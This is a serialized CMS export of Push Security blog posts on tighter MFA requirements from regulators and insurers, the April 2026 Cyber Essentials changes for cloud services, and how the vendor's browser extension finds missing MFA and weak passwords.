14028 elevate the standard further, calling for phishing-resistant MFA for federal systems and contractors.",[],{},{"nodeType":254,"data":26908,"content":26909},{},[26910],{"nodeType":178,"data":26911,"content":26912},{},[26913],{"nodeType":173,"value":26914,"marks":26915,"data":26916},"Frameworks and standards like ISO/IEC 27001, CIS Controls v8, and SOC 2 increasingly expect MFA coverage to be demonstrated during audits and certification processes.",[],{},{"nodeType":178,"data":26918,"content":26919},{},[26920],{"nodeType":173,"value":26921,"marks":26922,"data":26923},"These frameworks vary in tone and scope, but the message is consistent across the board. MFA must be enforced, not just in theory.",[],{},{"nodeType":312,"data":26925,"content":26929},{"target":26926},{"sys":26927},{"id":26928,"type":317,"linkType":318},"7dOxw1w8Ut5WDBDOki20We",[],{"nodeType":231,"data":26931,"content":26932},{},[],{"nodeType":169,"data":26934,"content":26935},{},[26936],{"nodeType":173,"value":26937,"marks":26938,"data":26940},"Insurers are scrutinising MFA gaps too",[26939],{"type":370},{},{"nodeType":178,"data":26942,"content":26943},{},[26944],{"nodeType":173,"value":26945,"marks":26946,"data":26947},"It’s not just regulators getting stricter. Insurers are building in MFA as a minimum condition of insurance coverage. ",[],{},{"nodeType":178,"data":26949,"content":26950},{},[26951],{"nodeType":173,"value":26952,"marks":26953,"data":26954},"Organizations are incentivized to have MFA. Roughly 20-25% of cyber insurance premiums are dictated by the security controls in place: MFA, EDR, regular patching, etc. ",[],{},{"nodeType":178,"data":26956,"content":26957},{},[26958],{"nodeType":173,"value":26959,"marks":26960,"data":26961},"After a breach, insurers bring in incident response teams to analyze what happened. Their job is to determine how the attacker got in and whether the controls you claimed to have were actually in place. If the entry point had no effective MFA and your policy attested that it did, the insurer may treat that as misrepresentation.",[],{},{"nodeType":178,"data":26963,"content":26964},{},[26965],{"nodeType":173,"value":26966,"marks":26967,"data":26968},"If your self-attested MFA coverage doesn’t hold up under investigation, your provider may not be required to pay, and you’re left footing the bill for IR, recovery, legal fees, and business disruption.",[],{},{"nodeType":235,"data":26970,"content":26971},{},[26972],{"nodeType":173,"value":26973,"marks":26974,"data":26976},"Case study: City of Hamilton, Ontario",[26975],{"type":370},{},{"nodeType":178,"data":26978,"content":26979},{},[26980],{"nodeType":173,"value":26981,"marks":26982,"data":26983},"The Canadian city of Hamilton, Ontario fell victim to a ransomware attack in February 2024. Attackers disabled nearly 80% of the city’s network and demanded a ransom of roughly $18.5 million in exchange for a decryption tool to unscramble the data.",[],{},{"nodeType":178,"data":26985,"content":26986},{},[26987],{"nodeType":173,"value":26988,"marks":26989,"data":26990},"They attempted to claim $5 million under their cyber insurance policy. After more than a year of dispute, the claim was denied because of MFA gaps — a condition of the coverage. Taxpayers were left to foot the $18.3 million bill, including cleanup, rebuild, and one-time consultancy fees.",[],{},{"nodeType":231,"data":26992,"content":26993},{},[],{"nodeType":169,"data":26995,"content":26996},{},[26997],{"nodeType":173,"value":26998,"marks":26999,"data":27001},"The future of compliance will be driven by cyber attacks",[27000],{"type":370},{},{"nodeType":178,"data":27003,"content":27004},{},[27005],{"nodeType":173,"value":27006,"marks":27007,"data":27008},"The direction of travel is consistent: frameworks are getting stricter, auditors are getting more technical, and enforcement is starting to hit data processors as well as controllers. ",[],{},{"nodeType":178,"data":27010,"content":27011},{},[27012],{"nodeType":173,"value":27013,"marks":27014,"data":27015},"But there’s more to it than that. In-the-wild breaches are exposing just how much business IT has evolved — and where security controls haven’t kept up. ",[],{},{"nodeType":178,"data":27017,"content":27018},{},[27019],{"nodeType":173,"value":27020,"marks":27021,"data":27022},"With the SaaS-ification of enterprise IT, core business systems aren’t locally deployed and centrally managed in the way they used to be. Instead, they’re logged into over the internet, via a web browser.",[],{},{"nodeType":312,"data":27024,"content":27028},{"target":27025},{"sys":27026},{"id":27027,"type":317,"linkType":318},"4h4hUYAghbZavOwjRTnBe2",[],{"nodeType":178,"data":27030,"content":27031},{},[27032],{"nodeType":173,"value":27033,"marks":27034,"data":27035},"So it’s not surprising that modern attackers are now targeting these apps directly. The most logical way to do this is by targeting users of those apps via identities — the vehicle by which apps are accessed and used. ",[],{},{"nodeType":178,"data":27037,"content":27038},{},[27039,27043,27051,27055,27060],{"nodeType":173,"value":27040,"marks":27041,"data":27042},"Sitting outside the typical security control boundary, it’s no surprise that this has become the soft underbelly in the crosshairs of attackers. Organizations are dealing with a vast and vulnerable attack surface consisting of ",[],{},{"nodeType":186,"data":27044,"content":27045},{"uri":4492},[27046],{"nodeType":173,"value":27047,"marks":27048,"data":27050},"hundreds of applications, with thousands of accounts",[27049],{"type":194},{},{"nodeType":173,"value":27052,"marks":27053,"data":27054}," spread across the app estate. ",[],{},{"nodeType":173,"value":27056,"marks":27057,"data":27059},"2 in 5 of these accounts are missing MFA",[27058],{"type":370},{},{"nodeType":173,"value":27061,"marks":27062,"data":27063},", and many also have a password vulnerability (such as appearing in a password breach or compromised credential feed) that means they’re sitting ducks for an attacker, waiting to be exploited. ",[],{},{"nodeType":3769,"data":27065,"content":27066},{},[27067],{"nodeType":178,"data":27068,"content":27069},{},[27070],{"nodeType":173,"value":27071,"marks":27072,"data":27073},"Due to SaaS blind-spots, 2 in 5 accounts are missing MFA. ",[],{},{"nodeType":312,"data":27075,"content":27079},{"target":27076},{"sys":27077},{"id":27078,"type":317,"linkType":318},"3WFzina1t5j6bDlTlGQA0l",[],{"nodeType":231,"data":27081,"content":27082},{},[],{"nodeType":169,"data":27084,"content":27085},{},[27086],{"nodeType":173,"value":5144,"marks":27087,"data":27089},[27088],{"type":370},{},{"nodeType":235,"data":27091,"content":27092},{},[27093],{"nodeType":173,"value":27094,"marks":27095,"data":27097},"Achieve complete MFA visibility and remediate gaps with Push Security",[27096],{"type":370},{},{"nodeType":178,"data":27099,"content":27100},{},[27101],{"nodeType":173,"value":27102,"marks":27103,"data":27104},"You can’t enforce identity policy if you can’t see where it breaks. Push gives you live, browser-based insight into how users actually authenticate – what apps they access, how they log in, and where protections like MFA fall short. Because Push runs natively in the browser, you get full coverage and built-in guardrails, without relying on app integrations, enabling you to:",[],{},{"nodeType":250,"data":27106,"content":27107},{},[27108,27118,27128],{"nodeType":254,"data":27109,"content":27110},{},[27111],{"nodeType":178,"data":27112,"content":27113},{},[27114],{"nodeType":173,"value":27115,"marks":27116,"data":27117},"Understand how identities are really used across apps",[],{},{"nodeType":254,"data":27119,"content":27120},{},[27121],{"nodeType":178,"data":27122,"content":27123},{},[27124],{"nodeType":173,"value":27125,"marks":27126,"data":27127},"Catch misconfigurations, missing MFA, and accounts using vulnerable passwords",[],{},{"nodeType":254,"data":27129,"content":27130},{},[27131],{"nodeType":178,"data":27132,"content":27133},{},[27134],{"nodeType":173,"value":27135,"marks":27136,"data":27137},"Guide users to fix issues before they become incidents",[],{},{"nodeType":312,"data":27139,"content":27142},{"target":27140},{"sys":27141},{"id":26655,"type":317,"linkType":318},[],{"nodeType":178,"data":27144,"content":27145},{},[27146],{"nodeType":173,"value":37,"marks":27147,"data":27148},[],{},{"nodeType":312,"data":27150,"content":27154},{"target":27151},{"sys":27152},{"id":27153,"type":317,"linkType":318},"2mpx0GOwIviUAdvLGitxua",[],{"nodeType":231,"data":27156,"content":27157},{},[],{"nodeType":235,"data":27159,"content":27160},{},[27161],{"nodeType":173,"value":27162,"marks":27163,"data":27165},"Prepare your organization for the new world of browser-based attacks",[27164],{"type":370},{},{"nodeType":178,"data":27167,"content":27168},{},[27169],{"nodeType":173,"value":27170,"marks":27171,"data":27172},"As attacks continue to evolve, we can expect regulators, insurers, and policy-makers to follow. ",[],{},{"nodeType":178,"data":27174,"content":27175},{},[27176,27179,27188],{"nodeType":173,"value":37,"marks":27177,"data":27178},[],{},{"nodeType":186,"data":27180,"content":27182},{"uri":27181},"https://pushsecurity.com/blog/6-browser-based-attacks-every-security-team-should-be-prepared-for/",[27183],{"nodeType":173,"value":27184,"marks":27185,"data":27187},"Attacks that target users in their web browsers have seen an unprecedented rise in recent years",[27186],{"type":194},{},{"nodeType":173,"value":27189,"marks":27190,"data":27191},", exploiting the biggest security blind-spot in the enterprise security stack. ",[],{},{"nodeType":312,"data":27193,"content":27197},{"target":27194},{"sys":27195},{"id":27196,"type":317,"linkType":318},"4ogNqZdObSIJXavHP44lom",[],{"nodeType":178,"data":27199,"content":27200},{},[27201],{"nodeType":173,"value":27202,"marks":27203,"data":27204},"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":27206,"content":27207},{},[27208,27211,27218,27221,27228],{"nodeType":173,"value":1451,"marks":27209,"data":27210},[],{},{"nodeType":186,"data":27212,"content":27213},{"uri":1456},[27214],{"nodeType":173,"value":1459,"marks":27215,"data":27217},[27216],{"type":194},{},{"nodeType":173,"value":1464,"marks":27219,"data":27220},[],{},{"nodeType":186,"data":27222,"content":27223},{"uri":1469},[27224],{"nodeType":173,"value":1472,"marks":27225,"data":27227},[27226],{"type":194},{},{"nodeType":173,"value":1477,"marks":27229,"data":27230},[],{},"How cyber breaches are driving tighter MFA requirements and enforcement","MFA regulators, insurers, and policy-makers are getting tighter on their MFA requirements, fuelled by public cyber breaches. ","2025-09-19T00:00:00.000Z","how-cyber-breaches-are-driving-tighter-mfa-requirements-and-enforcement",{"items":27236},[27237,27239],{"sys":27238,"name":505},{"id":504},{"sys":27240,"name":26137},{"id":26136},{"items":27242},[27243],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":27244},{"url":1496},{"items":27246},[27247],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":27248},{"url":1496},{"json":27250,"links":27924},{"nodeType":165,"data":27251,"content":27252},{},[27253,27261,27294,27300,27306,27313,27392,27399,27402,27410,27417,27424,27431,27437,27444,27447,27455,27462,27470,27477,27483,27502,27522,27530,27536,27574,27580,27588,27595,27618,27624,27630,27636,27639,27647,27654,27660,27667,27675,27682,27689,27737,27743,27750,27753,27761,27768,27831,27834,27842,27862,27869,27876,27913,27918],{"nodeType":169,"data":27254,"content":27255},{},[27256],{"nodeType":173,"value":27257,"marks":27258,"data":27260},"Key changes for 2026 — and what they mean in practice",[27259],{"type":370},{},{"nodeType":178,"data":27262,"content":27263},{},[27264,27268,27277,27281,27290],{"nodeType":173,"value":27265,"marks":27266,"data":27267},"Backed by the UK’s National Cyber Security Centre (NCSC), Cyber Essentials is a minimum requirement for operating in the UK and working with UK businesses. NCSC and IASME have issued an ",[],{},{"nodeType":186,"data":27269,"content":27271},{"uri":27270},"https://www.ncsc.gov.uk/files/cyber-essentials-requirements-for-it-infrastructure-v3-3.pdf",[27272],{"nodeType":173,"value":27273,"marks":27274,"data":27276},"updated requirements document",[27275],{"type":194},{},{"nodeType":173,"value":27278,"marks":27279,"data":27280}," as well as ",[],{},{"nodeType":186,"data":27282,"content":27284},{"uri":27283},"https://iasme.co.uk/articles/upcoming-changes-to-the-cyber-essentials-scheme-april-2026-update/",[27285],{"nodeType":173,"value":27286,"marks":27287,"data":27289},"guidance on the changes",[27288],{"type":194},{},{"nodeType":173,"value":27291,"marks":27292,"data":27293}," planned to go-live in April 2026. The key changes relate to the definition of cloud services and the expectations around MFA enforcement, which will significantly expand the breadth of cloud and SaaS services in scope, as well as how compliance is measured.",[],{},{"nodeType":312,"data":27295,"content":27299},{"target":27296},{"sys":27297},{"id":27298,"type":317,"linkType":318},"49tk5y1sUXUQzDBhY7I8YM",[],{"nodeType":312,"data":27301,"content":27305},{"target":27302},{"sys":27303},{"id":27304,"type":317,"linkType":318},"5kGX19qPB7NQnojHXShBsW",[],{"nodeType":178,"data":27307,"content":27308},{},[27309],{"nodeType":173,"value":27310,"marks":27311,"data":27312},"This means that:",[],{},{"nodeType":250,"data":27314,"content":27315},{},[27316,27326,27354,27364,27382],{"nodeType":254,"data":27317,"content":27318},{},[27319],{"nodeType":178,"data":27320,"content":27321},{},[27322],{"nodeType":173,"value":27323,"marks":27324,"data":27325},"Any service accessed via a business email or account is considered in-scope. It doesn’t matter whether this is a “free” tier account on a SaaS service or a fully managed enterprise cloud platform. ",[],{},{"nodeType":254,"data":27327,"content":27328},{},[27329],{"nodeType":178,"data":27330,"content":27331},{},[27332,27336,27341,27345,27350],{"nodeType":173,"value":27333,"marks":27334,"data":27335},"If a service offers MFA, it ",[],{},{"nodeType":173,"value":27337,"marks":27338,"data":27340},"must",[27339],{"type":370},{},{"nodeType":173,"value":27342,"marks":27343,"data":27344}," be enabled for ",[],{},{"nodeType":173,"value":27346,"marks":27347,"data":27349},"all users",[27348],{"type":370},{},{"nodeType":173,"value":27351,"marks":27352,"data":27353},". (Apps that don’t offer MFA are incredibly rare).",[],{},{"nodeType":254,"data":27355,"content":27356},{},[27357],{"nodeType":178,"data":27358,"content":27359},{},[27360],{"nodeType":173,"value":27361,"marks":27362,"data":27363},"If a service offers MFA only as a \"paid add-on\" or part of a higher subscription tier (e.g., \"Enterprise\" vs. \"Basic\"), you are now required to pay for and enable it. ",[],{},{"nodeType":254,"data":27365,"content":27366},{},[27367],{"nodeType":178,"data":27368,"content":27369},{},[27370,27374,27378],{"nodeType":173,"value":27371,"marks":27372,"data":27373},"If the service doesn't have native MFA but allows you to sign in via a provider that ",[],{},{"nodeType":173,"value":404,"marks":27375,"data":27377},[27376],{"type":1646},{},{"nodeType":173,"value":27379,"marks":27380,"data":27381}," (like \"Sign in with Microsoft\" or Google), you must use only that method.",[],{},{"nodeType":254,"data":27383,"content":27384},{},[27385],{"nodeType":178,"data":27386,"content":27387},{},[27388],{"nodeType":173,"value":27389,"marks":27390,"data":27391},"This means that if \"shadow\" apps and accounts are identified — e.g. they find that your team is using a SaaS tool that doesn't have MFA, and it wasn't listed in your submission — you will be non-compliant.",[],{},{"nodeType":178,"data":27393,"content":27394},{},[27395],{"nodeType":173,"value":27396,"marks":27397,"data":27398},"This has significant ramifications for the attestation process that requires comprehensive visibility of every app, login method, and MFA factor. ",[],{},{"nodeType":231,"data":27400,"content":27401},{},[],{"nodeType":169,"data":27403,"content":27404},{},[27405],{"nodeType":173,"value":27406,"marks":27407,"data":27409},"Don’t worry, Push Security has the solution",[27408],{"type":370},{},{"nodeType":178,"data":27411,"content":27412},{},[27413],{"nodeType":173,"value":27414,"marks":27415,"data":27416},"Push provides you with visibility of every single cloud app your employees access and how they’re authenticating to them, giving you the controls needed to automatically enforce MFA and strong, unique passwords on all your corporate accounts. ",[],{},{"nodeType":178,"data":27418,"content":27419},{},[27420],{"nodeType":173,"value":27421,"marks":27422,"data":27423},"Push is able to do this by deploying into your employees’ existing browser, from where it observes the actual login process in real-time. This allows Push to capture 100% of cloud app usage, including free-tier apps and those accessed via personal email addresses or local credentials, which centralized SSO logs would miss.",[],{},{"nodeType":178,"data":27425,"content":27426},{},[27427],{"nodeType":173,"value":27428,"marks":27429,"data":27430},"Here’s a short interactive demo that shows you how Push helps you to prepare for Cyber Essentials by capturing all your cloud services and making sure MFA is enabled on all your user accounts.",[],{},{"nodeType":312,"data":27432,"content":27436},{"target":27433},{"sys":27434},{"id":27435,"type":317,"linkType":318},"2P0DtMURb1EvQJ4e8Ze4IC",[],{"nodeType":178,"data":27438,"content":27439},{},[27440],{"nodeType":173,"value":27441,"marks":27442,"data":27443},"This isn’t all Push does — we also detect and stop browser-native attacks like zero-day phishing, AitM toolkits, ClickFix attacks and account takeover — but more on that later. ",[],{},{"nodeType":231,"data":27445,"content":27446},{},[],{"nodeType":169,"data":27448,"content":27449},{},[27450],{"nodeType":173,"value":27451,"marks":27452,"data":27454},"But all our apps are managed and accessed via SSO…",[27453],{"type":370},{},{"nodeType":178,"data":27456,"content":27457},{},[27458],{"nodeType":173,"value":27459,"marks":27460,"data":27461},"Most organisations work on the assumption that their employees are using SSO to access the suite of business apps they use on a daily basis. Apps go through an onboarding process where they are configured to use the preferred SSO method (e.g. SAML, OIDC) from the preferred identity provider (Okta, Microsoft, Google, etc.). By enforcing secure login requirements on how employees login to their IdP account, you essentially secure the downstream logins to all of the business apps in use. ",[],{},{"nodeType":178,"data":27463,"content":27464},{},[27465],{"nodeType":173,"value":27466,"marks":27467,"data":27469},"The reality is quite different. ",[27468],{"type":370},{},{"nodeType":178,"data":27471,"content":27472},{},[27473],{"nodeType":173,"value":27474,"marks":27475,"data":27476},"Apps are routinely self-adopted by users. Most enterprises are using hundreds of apps across their workforce, for a variety of business purposes. ",[],{},{"nodeType":312,"data":27478,"content":27482},{"target":27479},{"sys":27480},{"id":27481,"type":317,"linkType":318},"6TjtfVoZ2vsWv6iD9IRL2r",[],{"nodeType":178,"data":27484,"content":27485},{},[27486,27490,27498],{"nodeType":173,"value":27487,"marks":27488,"data":27489},"Apps typically allow multiple, simultaneous login methods to exist. Many apps don’t allow you to restrict this even with admin-level controls (or needing to pay extra for the privilege). A huge number of apps don't even allow you to configure SAML SSO ",[],{},{"nodeType":186,"data":27491,"content":27493},{"uri":27492},"https://sso.tax/",[27494],{"nodeType":173,"value":27495,"marks":27496,"data":27497},"without paying extra for the privilege",[],{},{"nodeType":173,"value":27499,"marks":27500,"data":27501}," (if they offer it at all).",[],{},{"nodeType":178,"data":27503,"content":27504},{},[27505,27509,27513,27517],{"nodeType":173,"value":27506,"marks":27507,"data":27508},"This means you can have a local password active at the same time as a secure SSO login option — we call these ",[],{},{"nodeType":173,"value":835,"marks":27510,"data":27512},[27511],{"type":370},{},{"nodeType":173,"value":27514,"marks":27515,"data":27516},". The worst part is that you can have an SSO login protected by MFA, at the same time as a local password without. This is one of the key reasons why we see that",[],{},{"nodeType":173,"value":27518,"marks":27519,"data":27521}," 2 in 5 accounts are missing MFA. ",[27520],{"type":370},{},{"nodeType":178,"data":27523,"content":27524},{},[27525],{"nodeType":173,"value":27526,"marks":27527,"data":27529},"Under the new regulations, this would be an automatic fail if discovered. ",[27528],{"type":370},{},{"nodeType":312,"data":27531,"content":27535},{"target":27532},{"sys":27533},{"id":27534,"type":317,"linkType":318},"4QnFioDFWpwzMR3XxC6GyX",[],{"nodeType":178,"data":27537,"content":27538},{},[27539,27543,27549,27553,27558,27562,27571],{"nodeType":173,"value":27540,"marks":27541,"data":27542},"Even more complexity comes in ",[],{},{"nodeType":173,"value":27544,"marks":27545,"data":27548},"how",[27546,27547],{"type":1646},{"type":370},{},{"nodeType":173,"value":27550,"marks":27551,"data":27552}," MFA can be enforced. ",[],{},{"nodeType":173,"value":27554,"marks":27555,"data":27557},"Some SaaS services only allow MFA to be self-adopted",[27556],{"type":370},{},{"nodeType":173,"value":27559,"marks":27560,"data":27561}," rather than centrally enforced by admin controls. This can often be linked to the product tier, with a higher level subscription required for tenant-level security features. Similarly, some apps do not provide admin-level visibility of MFA configuration for individual accounts. ",[],{},{"nodeType":186,"data":27563,"content":27565},{"uri":27564},"https://pushsecurity.com/blog/minimum-viable-identity-security/",[27566],{"nodeType":173,"value":27567,"marks":27568,"data":27570},"How each vendor chooses to set up their app is very inconsistent.",[27569],{"type":194},{},{"nodeType":173,"value":3107,"marks":27572,"data":27573},[],{},{"nodeType":312,"data":27575,"content":27579},{"target":27576},{"sys":27577},{"id":27578,"type":317,"linkType":318},"3Dw7AHvU9oYZDBfcZBNEEO",[],{"nodeType":235,"data":27581,"content":27582},{},[27583],{"nodeType":173,"value":27584,"marks":27585,"data":27587},"The ripple effect",[27586],{"type":370},{},{"nodeType":178,"data":27589,"content":27590},{},[27591],{"nodeType":173,"value":27592,"marks":27593,"data":27594},"The nature of the changes to the scope means that areas you were previously comfortable attesting to become way more complex. ",[],{},{"nodeType":250,"data":27596,"content":27597},{},[27598,27608],{"nodeType":254,"data":27599,"content":27600},{},[27601],{"nodeType":178,"data":27602,"content":27603},{},[27604],{"nodeType":173,"value":27605,"marks":27606,"data":27607},"You have to enforce password policies and account lifecycle management on a long tail of SaaS, not just previously identified “core” apps. ",[],{},{"nodeType":254,"data":27609,"content":27610},{},[27611],{"nodeType":178,"data":27612,"content":27613},{},[27614],{"nodeType":173,"value":27615,"marks":27616,"data":27617},"This applies to external contractors too.",[],{},{"nodeType":312,"data":27619,"content":27623},{"target":27620},{"sys":27621},{"id":27622,"type":317,"linkType":318},"6qdjxv3WOfQKPomoZWKuyA",[],{"nodeType":312,"data":27625,"content":27629},{"target":27626},{"sys":27627},{"id":27628,"type":317,"linkType":318},"2aTPDpdbAgO6skBV4RQfqK",[],{"nodeType":312,"data":27631,"content":27635},{"target":27632},{"sys":27633},{"id":27634,"type":317,"linkType":318},"Zfg0cIez6MOHTvnEpeNa3",[],{"nodeType":231,"data":27637,"content":27638},{},[],{"nodeType":169,"data":27640,"content":27641},{},[27642],{"nodeType":173,"value":27643,"marks":27644,"data":27646},"Will your assumptions stand up to scrutiny? ",[27645],{"type":370},{},{"nodeType":178,"data":27648,"content":27649},{},[27650],{"nodeType":173,"value":27651,"marks":27652,"data":27653},"Previously, the approach to an audit would have been to show that the IdP dashboard is configured to require mandatory MFA, and all business apps are accessed securely via the IdP interface.  ",[],{},{"nodeType":312,"data":27655,"content":27659},{"target":27656},{"sys":27657},{"id":27658,"type":317,"linkType":318},"3eLWMRE98VZqlAb9g4AKIa",[],{"nodeType":178,"data":27661,"content":27662},{},[27663],{"nodeType":173,"value":27664,"marks":27665,"data":27666},"But this only shows part of the picture. Cyber Essentials auditors typically interview employees and ask them to demonstrate logging into a variety of apps to show the MFA status and overall login process (e.g. are they using a password manager, do passwords meet the requirements, etc.). If the auditor discovers an app you were unaware of, that is accessed without using MFA, you’ve failed. ",[],{},{"nodeType":235,"data":27668,"content":27669},{},[27670],{"nodeType":173,"value":27671,"marks":27672,"data":27674},"This isn’t just a compliance concern — it’s a real security threat",[27673],{"type":370},{},{"nodeType":178,"data":27676,"content":27677},{},[27678],{"nodeType":173,"value":27679,"marks":27680,"data":27681},"The reason that compliance is being forced to evolve is that this kind of security gap is being routinely exploited by attackers in the wild. Compromised credentials are available online in their billions, and that’s all an attacker needs to log into an account without MFA. ",[],{},{"nodeType":178,"data":27683,"content":27684},{},[27685],{"nodeType":173,"value":27686,"marks":27687,"data":27688},"The recent criminal campaigns against Snowflake and Jira customers demonstrate this risk. ",[],{},{"nodeType":250,"data":27690,"content":27691},{},[27692,27714],{"nodeType":254,"data":27693,"content":27694},{},[27695],{"nodeType":178,"data":27696,"content":27697},{},[27698,27702,27710],{"nodeType":173,"value":27699,"marks":27700,"data":27701},"The 2024 ",[],{},{"nodeType":186,"data":27703,"content":27704},{"uri":819},[27705],{"nodeType":173,"value":27706,"marks":27707,"data":27709},"Snowflake",[27708],{"type":194},{},{"nodeType":173,"value":27711,"marks":27712,"data":27713}," breaches resulted in billions of records being stolen from 165+ Snowflake tenants. Attackers simply logged into accounts without MFA at scale — >80% of the credentials had been leaked online as early as 2020. ",[],{},{"nodeType":254,"data":27715,"content":27716},{},[27717],{"nodeType":178,"data":27718,"content":27719},{},[27720,27724,27733],{"nodeType":173,"value":27721,"marks":27722,"data":27723},"Criminals went on a ",[],{},{"nodeType":186,"data":27725,"content":27727},{"uri":27726},"https://pushsecurity.com/blog/why-attackers-are-targeting-jira-with-stolen-credentials/",[27728],{"nodeType":173,"value":27729,"marks":27730,"data":27732},"Jira",[27731],{"type":194},{},{"nodeType":173,"value":27734,"marks":27735,"data":27736}," hacking spree, compromising 10 organizations publicly — including Jaguar Land Rover. The same attackers were then involved in the Scattered Lapsus$ Hunters ransomware operation that went down as the most economically consequential cyber breach to affect a G7 economy. ",[],{},{"nodeType":312,"data":27738,"content":27742},{"target":27739},{"sys":27740},{"id":27741,"type":317,"linkType":318},"7baNZATRrb7yrLqsJxQo83",[],{"nodeType":178,"data":27744,"content":27745},{},[27746],{"nodeType":173,"value":27747,"marks":27748,"data":27749},"The reality is that this has been happening for years. Regulation is always slow to catch up. It’s important that organizations understand why these changes are being made — to tackle the threat. ",[],{},{"nodeType":231,"data":27751,"content":27752},{},[],{"nodeType":169,"data":27754,"content":27755},{},[27756],{"nodeType":173,"value":27757,"marks":27758,"data":27760},"Achieving compliance (and more importantly, security) with Push",[27759],{"type":370},{},{"nodeType":178,"data":27762,"content":27763},{},[27764],{"nodeType":173,"value":27765,"marks":27766,"data":27767},"Here’s how you can use Push to comply with Cyber Essentials v3.3 onwards, as well as safeguard your business and users from threats.",[],{},{"nodeType":250,"data":27769,"content":27770},{},[27771,27786,27801,27816],{"nodeType":254,"data":27772,"content":27773},{},[27774],{"nodeType":178,"data":27775,"content":27776},{},[27777,27782],{"nodeType":173,"value":27778,"marks":27779,"data":27781},"Discover apps and get them behind SSO: ",[27780],{"type":370},{},{"nodeType":173,"value":27783,"marks":27784,"data":27785},"Push captures every login from the browser, regardless of whether it’s federated or shadow. It builds a full map of your organization’s true identity footprint, including all accounts, apps, authentication methods, and SSO gaps. This allows you to spot apps that have been self adopted and take action. ",[],{},{"nodeType":254,"data":27787,"content":27788},{},[27789],{"nodeType":178,"data":27790,"content":27791},{},[27792,27797],{"nodeType":173,"value":27793,"marks":27794,"data":27796},"Review MFA status and enforce MFA: ",[27795],{"type":370},{},{"nodeType":173,"value":27798,"marks":27799,"data":27800},"You can see the MFA status of every app, both at the IdP and local app level, as well as the type of MFA method used to assess security strength. This allows you to find and eliminate “ghost logins” not protected by MFA — by configuring MFA at the app level, or removing the local credential. You can also prompt employees to register an MFA method in real time as they access an app in their browser.",[],{},{"nodeType":254,"data":27802,"content":27803},{},[27804],{"nodeType":178,"data":27805,"content":27806},{},[27807,27812],{"nodeType":173,"value":27808,"marks":27809,"data":27811},"Find and fix weak, breached, and reused passwords: ",[27810],{"type":370},{},{"nodeType":173,"value":27813,"marks":27814,"data":27815},"Push check the posture of all your employee passwords. The browser agent accomplishes this by creating a salted hash of a user’s observed password and then taking the first 8 characters of that hash to store locally in the browser, checking it against a list of 10,000 common basewords and common permutations); flagging if it is reused across accounts (i.e. not unique) and has appeared in a data breach or compromised credential feed.",[],{},{"nodeType":254,"data":27817,"content":27818},{},[27819],{"nodeType":178,"data":27820,"content":27821},{},[27822,27827],{"nodeType":173,"value":27823,"marks":27824,"data":27826},"Easily deploy to contractors and third-parties: ",[27825],{"type":370},{},{"nodeType":173,"value":27828,"marks":27829,"data":27830},"Push’s lightweight extension is easy to deploy to any machine, including those you don’t directly manage. Deploying Push into a dedicated contractor browser profile means you can track third-party logins to your apps exactly like you would an internal employee. ",[],{},{"nodeType":231,"data":27832,"content":27833},{},[],{"nodeType":169,"data":27835,"content":27836},{},[27837],{"nodeType":173,"value":27838,"marks":27839,"data":27841},"Final thoughts",[27840],{"type":370},{},{"nodeType":178,"data":27843,"content":27844},{},[27845,27849,27858],{"nodeType":173,"value":27846,"marks":27847,"data":27848},"Cyber Essentials has taken a meaningful step toward addressing the real threat organizations face in the form of compromised credentials and MFA gaps, but they’re not alone. When missing MFA has led to a cyber breach, it has been met with both ",[],{},{"nodeType":186,"data":27850,"content":27852},{"uri":27851},"https://pushsecurity.com/resources/mfa-regulation-compliance",[27853],{"nodeType":173,"value":27854,"marks":27855,"data":27857},"regulatory fines and insurance non-payment",[27856],{"type":194},{},{"nodeType":173,"value":27859,"marks":27860,"data":27861},", with NYDFS in particular leading the charge. ",[],{},{"nodeType":178,"data":27863,"content":27864},{},[27865],{"nodeType":173,"value":27866,"marks":27867,"data":27868},"But this isn’t the only threat organizations face. Modern, browser-native attacks are dominating the breach headlines, with attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, ConsentFix, and session hijacking. ",[],{},{"nodeType":178,"data":27870,"content":27871},{},[27872],{"nodeType":173,"value":27873,"marks":27874,"data":27875},"Push tackles all of these attacks using behavioral threat detection controls, powered by deep browser telemetry, to provide broad detection and blocking capabilities against attacks happening in the browser. This means analyzing the end-to-end process of a webpage loading/running in the browser, and how the user interacts with the page, to spot universal indicators of bad activity. ",[],{},{"nodeType":178,"data":27877,"content":27878},{},[27879,27883,27890,27893,27900,27903,27910],{"nodeType":173,"value":27880,"marks":27881,"data":27882},"Want to learn more about Push and how we can help? ",[],{},{"nodeType":186,"data":27884,"content":27885},{"uri":1456},[27886],{"nodeType":173,"value":3932,"marks":27887,"data":27889},[27888],{"type":194},{},{"nodeType":173,"value":2936,"marks":27891,"data":27892},[],{},{"nodeType":186,"data":27894,"content":27895},{"uri":3941},[27896],{"nodeType":173,"value":3944,"marks":27897,"data":27899},[27898],{"type":194},{},{"nodeType":173,"value":3949,"marks":27901,"data":27902},[],{},{"nodeType":186,"data":27904,"content":27905},{"uri":1469},[27906],{"nodeType":173,"value":1472,"marks":27907,"data":27909},[27908],{"type":194},{},{"nodeType":173,"value":1477,"marks":27911,"data":27912},[],{},{"nodeType":312,"data":27914,"content":27917},{"target":27915},{"sys":27916},{"id":27153,"type":317,"linkType":318},[],{"nodeType":178,"data":27919,"content":27920},{},[27921],{"nodeType":173,"value":37,"marks":27922,"data":27923},[],{},{"entries":27925},{"hyperlink":27926,"inline":27927,"block":27928},[],[],[27929,27936,27943,27948,27953,27959,28010,28016,28022,28029,28035,28060],{"sys":27930,"__typename":5345,"title":27931,"caption":27931,"layoutMode":118,"file":27932},{"id":27298},"Update to the definition of cloud services (NCSC): i.e. any service that is accessed with a business email or account.",{"url":27933,"width":27934,"height":27935},"https://images.ctfassets.net/y1cdw1ablpvd/fIVcKhF4DdxwjGFPBv8AP/744683ac8a97c90483b98cf2289c8c8a/image8_1.png",1193,247,{"sys":27937,"__typename":5345,"title":27938,"caption":27938,"layoutMode":118,"file":27939},{"id":27304},"Changes to the marking criteria (IASME): i.e. MFA is expected to be enforced for logins to every cloud 